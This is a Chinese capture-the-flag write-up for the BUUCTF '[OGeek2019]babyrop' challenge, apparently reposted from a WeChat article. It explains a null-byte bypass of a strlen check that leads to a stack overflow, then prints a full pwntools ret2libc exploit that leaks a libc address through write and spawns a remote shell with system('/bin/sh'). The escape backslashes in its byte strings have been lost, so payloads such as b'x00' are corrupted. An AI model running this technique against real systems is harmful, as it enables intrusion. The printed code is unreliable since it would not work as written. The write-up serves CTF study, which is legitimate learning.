题目
平台:BUUCTF
题目:[OGeek2019]babyrop
考点:32位ret2libc(write泄露)& x00绕过strlen
分析
checksec查看防护状态
ubuntu@ubuntu-vm:~/Desktop/pwn$ checksec pwn
[*] '/home/ubuntu/Desktop/pwn/pwn'
Arch: i386-32-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
IDA反编译后看到生成随机数a1,输入buf去猜,但是由于有strlen()计算输入的长度来逐位判断是否与随机数相同
所以我们输入x00开头的数,使strlen()返回0,从而绕过strncmp()的过程
return的buf[7]是下一个函数的buf可输入长度,设定成xff那么就会产生栈溢出
由于没有system和/bin/sh,且没有puts@plt函数,那么就只能采用32位的write函数ret2libc了
本题给了libc文件,那么也就不需要再去使用LibcSearcher了
漏洞利用
from pwn import *
from LibcSearcher import *
context(log_level = 'debug', arch = 'i386', os = 'linux')
p = remote('node5.buuoj.cn', 29001)
#p=process('./pwn')
#p=gdb.debug('./pwn','b main')
elf = ELF('./pwn')
libc=ELF('./libc-2.23.so')
write_plt = elf.plt['write']
write_got = elf.got['write']
#main_addr = elf.symbols['main']
main_addr = 0x8048825
payload = b'x00' + b'a'*6 +b'xff'
p.sendline(payload)
payload = b'a'*(0xe7+0x4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload)
write_addr = u32(p.recvuntil(b"xf7")[-4:])
print(hex(write_addr))
#libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.symbols['write']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
payload = b'x00' + b'a'*6 +b'xff'
p.sendline(payload)
payload = b'a'*(0xe7+0x4)+p32(system)+p32(0xdeadbeef)+p32(binsh)
p.sendline(payload)
p.interactive()
原文始发于微信公众号(智佳网络安全):CTF学习-PWN-ret2libc_2
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/300903.html
